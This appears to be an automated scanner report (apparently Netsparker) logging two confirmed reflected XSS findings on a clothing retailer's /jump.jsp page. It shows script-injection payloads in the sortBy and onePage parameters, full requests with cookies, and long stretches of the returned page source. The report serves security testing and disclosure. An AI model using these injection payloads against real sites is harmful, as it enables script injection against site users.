var elementName = document.ProductDetail.elements[i].name;
//alert("Name: " + elementName + ", Type: " + document.ProductDetail.elements[i].type + ", Value: " + document.ProductDetail[elementName].value);
if (elementName.indexOf("qty") == 0) {
// if the quantity is greater than zero then check the
// options to make sure they've been set.
var qtyval=0;

qtyval = document.ProductDetail[elementName].value;

// GRG Added check for qty to be larger than 5 per cbrt request #03048.
if ((qtyval > 0) && (qtyval < 6)) {
blnValidQty = true;
if (elementName.length > 3) {
// multi-product
strSuffix = elementName.substring(3);
}
// Build CheckOut Message
sCheckoutMsg += "\r\n" + qtyval + " " + eval("document.ProductDetail." + "pName" + strSuffix + ".value");
// Search for options...
var strOptName = "options" + strSuffix;
for (j=0;j<document.ProductDetail.elements.length;j++) {
if (document.ProductDetail.elements[j].name == strOptName) {

if (document.ProductDetail.elements[j].type == "select-one") {
var intSelected = document.ProductDetail.elements[j].selectedIndex;
if(document.ProductDetail.elements[j].options[intSelected].value == 0) {
blnIsValid = false;
}
}// end select handler
}// end name check
}// end for(j)
if(blnIsValid && blnValidQty && bIsPerzValid) {
bIsPerzValid = validatePersonalization(strSuffix);
//alert (bIsPerzValid);
}
} //if (qtyval > 0)
} //end if (elementName.indexOf("qty") == 0)
//Added for Customization
if (elementName == "CustOptions") {
blnCustomOptions = true;
//alert("Custom - True");
} //else { alert("Custom - False"); }
} //end for (i=0;i<document.ProductDetail.elements.length;i++)
if (blnCustomOptions) {
if (document.ProductDetail.CustomOptionId.value == 0) {
alert("Select valid Custom Option.");
blnIsValid = false;
}
}//end if (blnCustomOptions)
//End Customization

var ns4 = (document.layers)? true:false
//alert("is checkout? " + bIsCheckout);
//alert("checkout msg: " + sCheckoutMsg);
//alert("Is NetScape: " + ns4);
if(bIsCheckout){
if(sCheckoutMsg!=""){
if(!confirmCheckout(sCheckoutMsg)){
blnValidQty = true;
blnIsValid = true;
document.ProductDetail.ATBCCO.value = "1";
}
} else {
blnValidQty = true;
blnIsValid = true;
}
}
if (!blnIsValid) {
alert("Select valid option(s).");
}else if (!blnValidQty) {
if(bIsCheckout){
blnIsValid = true;
}else{
if (qtyval > 0) {
alert("Please limit your order to quantities of 5 or less. For larger orders please contact customer service. ");
}
else {
alert("A quantity has not been entered. ");
}
blnIsValid = false;
}
} else if(!bIsPerzValid) {
alert(perzErrMsg);
blnIsValid = false;
}
return blnIsValid;
//return false;

}

function setATBOCO(inValue) {
document.ProductDetail.ATBOCO.value=inValue;
//alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
return true;
}
function checkoutForNS_onclick() {
document.ProductDetail.ATBOCO.value="1";
alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
if(formValidate){
document.ProductDetail.submit();
}
}
function confirmCheckout(sItemsIn) {
var sCheckoutMsg = "Do you wish to add the following items to\r\nyour shopping basket before you check out?\r\n" + sItemsIn;
if (confirm(sCheckoutMsg)) {
return true;
}else {
return false;
}
}
function selectCustomOption(frm){
//alert (frm.CustomOptionId.value);
var iCustomOptionId = frm.CustOptions.options[frm.CustOptions.selectedIndex].value;
frm.CustomOptionId.value = iCustomOptionId ;
//alert(frm.CustomOptionId.value);
}

function formValidateCustomize(frm){
var bValid = true;
//alert(document.ProductCustomize.prompt1.value);
if (document.ProductCustomize.prompt1.value == "") {
bValid = false;
alert ("Please enter customization information in the fields provided.");
}
return bValid
}

function gotoNewWindowRememberSettings(oSelect, sProductID) {
var ns4 = (document.layers)? true:false
var ie4 = (document.all)? true:false
if (oSelect.options[oSelect.selectedIndex].value == -1) {
document.ProductDetail.ANSA.value=sProductID;
document.ProductDetail.submit();
}else{
document.ProductDetail.ANSA.value="0";
}
}

function validatePersonalization(rowNo) {
perzErrMsg = "";
var shfCode = getHiddenVariableForDetailPage("row_"+rowNo+"_perzShfCode");
var menu = document.getElementById("perzid_"+ rowNo+"_0");

if(menu) {
var selectedVal = menu[menu.selectedIndex].value;
//alert (' selectedVal :' + selectedVal);

// Monogramming validation
if(shfCode == 'M') {

var textField = document.getElementById("perzid_"+ rowNo+"_1");
// if menu is not selected but there is a value in text field message the user
if( (selectedVal == "0" || selectedVal == "None") && (textField.value !='') ){
perzErrMsg = "Please select Style.";
return false;
}else if( (selectedVal !="0" && selectedVal != "None") && textField.value=='' ){
perzErrMsg = "Please enter Initials.";
return false;
}
} else {
// pant hemming
var menu2 = document.getElementById("perzid_"+ rowNo+"_1");
var selectedVal2 = menu2[menu2.selectedIndex].value;
//alert (' selectedVal2 :' + selectedVal2);
// if there is value selected for the 1st drop down then only request for 2nd value.
if(selectedVal !="0" && selectedVal != "None"){
if(selectedVal2 == "0") {
perzErrMsg = "Please select Length.";<..

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT&path=1%2C2%2C4%2C14&iProductID=..

Parameters

Parameter	Type	Value
itemID	GET	3443
itemType	GET	PRODUCT
path	GET	1,2,4,14
iProductID	GET	3443
sortBy	GET	'"--></style></script><script>alert(0x0000B0)</script>
page	GET	1
onePage	GET	1

Request

GET /jump.jsp?itemID=3443&itemType=PRODUCT&path=1%2C2%2C4%2C14&iProductID=3443&sortBy='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000B0)%3C/script%3E&page=1&onePage=1 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=bY2TfXuSpmEe; RecentViewedItems=3443/9687
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:29:06 GMT
Server: Apache
ETag: "AAAAS54AXKE"
Last-Modified: Wed, 02 Mar 2011 19:18:04 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: RecentViewedItems=9687/3443; Path=/; Expires=Wed, 16-Mar-2011 19:18:03 GMT
Connection: close
Content-Type: text/html;charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>Made In The Fade Twill Long Sleeve Shirt - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT" rel="canonical" />

<meta name="description" content="Lightweight pigment garment-dyed cotton twill that's tumble-washed to stir up rustic texture. With abalone-style buttons, and our usual relaxed fit. Top buttonhole, penslot and cuff seams are finished with contrast-colored stitching. 100% cotton. Machine washable. Imported in Pool; White; Washed Red, Plum, Smokey Blue. Regular Sizes: S(34-36), M(38-40), L(42-44), XL(46-48), XXL(50-52) Tall Sizes: LT(42-44), XLT(46-48), XXLT(50-52)">

<meta name="keywords" content="Mens, shirts, Made In The Fade Twill Long Sleeve Shirt, 143750">

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

<script type="text/javascript">
<!--

var perzErrMsg = "";
function formValidate() {
var blnIsValid = true;
var blnValidQty = false;
var bIsCheckout = false;
var sCheckoutMsg = "";
var bIsPerzValid = true;

//alert("ATBOCO Value: " + document.ProductDetail.ATBOCO.value);
if(document.ProductDetail.ATBOCO.value == "1"){
bIsCheckout = true;
}
//alert("ATBOCO: " + document.ProductDetail.ATBOCO.value + ", Is Checkout: " + bIsCheckout);
var blnCustomOptions = false; //added for customization
for (i=0;i<document.ProductDetail.elements.length;i++){
var strSuffix = "";
var elementName = document.ProductDetail.elements[i].name;
//alert("Name: " + elementName + ", Type: " + document.ProductDetail.elements[i].type + ", Value: " + document.ProductDetail[elementName].value);
if (elementName.indexOf("qty") == 0) {
// if the quantity is greater than zero then check the
// options to make sure they've been set.
var qtyval=0;

qtyval = document.ProductDetail[elementName].value;

// GRG Added check for qty to be larger than 5 per cbrt request #03048.
if ((qtyval > 0) && (qtyval < 6)) {
blnValidQty = true;
if (elementName.length > 3) {
// multi-product
strSuffix = elementName.substring(3);
}
// Build CheckOut Message
sCheckoutMsg += "\r\n" + qtyval + " " + eval("document.ProductDetail." + "pName" + strSuffix + ".value");
// Search for options...
var strOptName = "options" + strSuffix;
for (j=0;j<document.ProductDetail.elements.length;j++) {
if (document.ProductDetail.elements[j].name == strOptName) {

if (document.ProductDetail.elements[j].type == "select-one") {
var intSelected = document.ProductDetail.elements[j].selectedIndex;
if(document.ProductDetail.elements[j].options[intSelected].value == 0) {
blnIsValid = false;
}
}// end select handler
}// end name check
}// end for(j)
if(blnIsValid && blnValidQty && bIsPerzValid) {
bIsPerzValid = validatePersonalization(strSuffix);
//alert (bIsPerzValid);
}
} //if (qtyval > 0)
} //end if (elementName.indexOf("qty") == 0)
//Added for Customization
if (elementName == "CustOptions") {
blnCustomOptions = true;
//alert("Custom - True");
} //else { alert("Custom - False"); }
} //end for (i=0;i<document.ProductDetail.elements.length;i++)
if (blnCustomOptions) {
if (document.ProductDetail.CustomOptionId.value == 0) {
alert("Select valid Custom Option.");
blnIsValid = false;
}
}//end if (blnCustomOptions)
//End Customization

var ns4 = (document.layers)? true:false
//alert("is checkout? " + bIsCheckout);
//alert("checkout msg: " + sCheckoutMsg);
//alert("Is NetScape: " + ns4);
if(bIsCheckout){
if(sCheckoutMsg!=""){
if(!confirmCheckout(sCheckoutMsg)){
blnValidQty = true;
blnIsValid = true;
document.ProductDetail.ATBCCO.value = "1";
}
} else {
blnValidQty = true;
blnIsValid = true;
}
}
if (!blnIsValid) {
alert("Select valid option(s).");
}else if (!blnValidQty) {
if(bIsCheckout){
blnIsValid = true;
}else{
if (qtyval > 0) {
alert("Please limit your order to quantities of 5 or less. For larger orders please contact customer service. ");
}
else {
alert("A quantity has not been entered. ");
}
blnIsValid = false;
}
} else if(!bIsPerzValid) {
alert(perzErrMsg);
blnIsValid = false;
}
return blnIsValid;
//return false;

}

function setATBOCO(inValue) {
document.ProductDetail.ATBOCO.value=inValue;
//alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
return true;
}
function checkoutForNS_onclick() {
document.ProductDetail.ATBOCO.value="1";
alert("Just Set ATBOCO Value As: " + document.ProductDetail.ATBOCO.value);
if(formValidate){
document.ProductDetail.submit();
}
}
function confirmCheckout(sItemsIn) {
var sCheckoutMsg = "Do you wish to add the following items to\r\nyour shopping basket before you check out?\r\n" + sItemsIn;
if (confirm(sCheckoutMsg)) {
return true;
}else {
return false;
}
}
function selectCustomOption(frm){
//alert (frm.CustomOptionId.value);
var iCustomOptionId = frm.CustOptions.options[frm.CustOptions.selectedIndex].value;
frm.CustomOptionId.value = iCustomOptionId ;
//alert(frm.CustomOptionId.value);
}

function formValidateCustomize(frm){
var bValid = true;
//alert(document.ProductCustomize.prompt1.value);
if (document.ProductCustomize.prompt1.value == "") {
bValid = false;
alert ("Please enter customization information in the fields provided.");
}
return bValid
}

function gotoNewWindowRememberSettings(oSelect, sProductID) {
var ns4 = (document.layers)? true:false
var ie4 = (document.all)? true:false
if (oSelect.options[oSelect.selectedIndex].value == -1) {
document.ProductDetail.ANSA.value=sProductID;
document.ProductDetail.submit();
}else{
document.ProductDetail.ANSA.value="0";
}
}

function validatePersonalization(rowNo) {
perzErrMsg = "";
var shfCode = getHiddenVariableForDetailPage("row_"+rowNo+"_perzShfCode");
var menu = document.getElementById("perzid_"+ rowNo+"_0");

if(menu) {
var selectedVal = menu[menu.selectedIndex].value;
//alert (' selectedVal :' + selectedVal);

// Monogramming validation
if(shfCode == 'M') {

var textField = document.getElementById("perzid_"+ rowNo+"_1");
// if menu is not selected but there is a value in text field message the user
if( (selectedVal == "0" || selectedVal == "None") && (textField.value !='') ){
perzErrMsg = "Please select Style.";
return false;
}else if( (selectedVal !="0" && selectedVal != "None") && textField.value=='' ){
perzErrMsg = "Please enter Initials.";
return false;..

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT&path=1%2C2%2C4%2C14&iProductID=..

Parameters

Parameter	Type	Value
itemID	GET	3443
itemType	GET	PRODUCT
path	GET	1,2,4,14
iProductID	GET	3443
sortBy	GET	alpha
page	GET	1
onePage	GET	"><script>alert(9)</script>

Request

GET /jump.jsp?itemID=3443&itemType=PRODUCT&path=1%2C2%2C4%2C14&iProductID=3443&sortBy=alpha&page=1&onePage=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=bY2TfXuSpmEe; RecentViewedItems=3443/9687
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:21:03 GMT
Server: Apache
ETag: "AAAAS54AnJj"
Last-Modified: Wed, 02 Mar 2011 19:19:09 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: RecentViewedItems=9687/3443; Path=/; Expires=Wed, 16-Mar-2011 19:19:09 GMT
Connection: close
Content-Type: text/html;charset=UTF-8



<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>Made In The Fade Twill Long Sleeve Shirt - The Territory Ahead</title>

<link href="http://www.territoryahead.com/jump.jsp?itemID=3443&itemType=PRODUCT" rel="canonical" />

<meta name="description" content="Lightweight pigment garment-dyed cotton twill that's tumble-washed to stir up rustic texture. With abalone-style buttons, and our usual relaxed fit. Top buttonhole, penslot and cuff seams are finished with contrast-colored stitching. 100% cotton. Machine washable. Imported in Pool; White; Washed Red, Plum, Smokey Blue. Regular Sizes: S(34-36), M(38-40), L(42-44), XL(46-48), XXL(50-52) Tall Sizes: LT(42-44), XLT(46-48), XXLT(50-52)">

<meta name="keywords" content="Mens, shirts, Made In The Fade Twill Long Sleeve Shirt, 143750">

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & 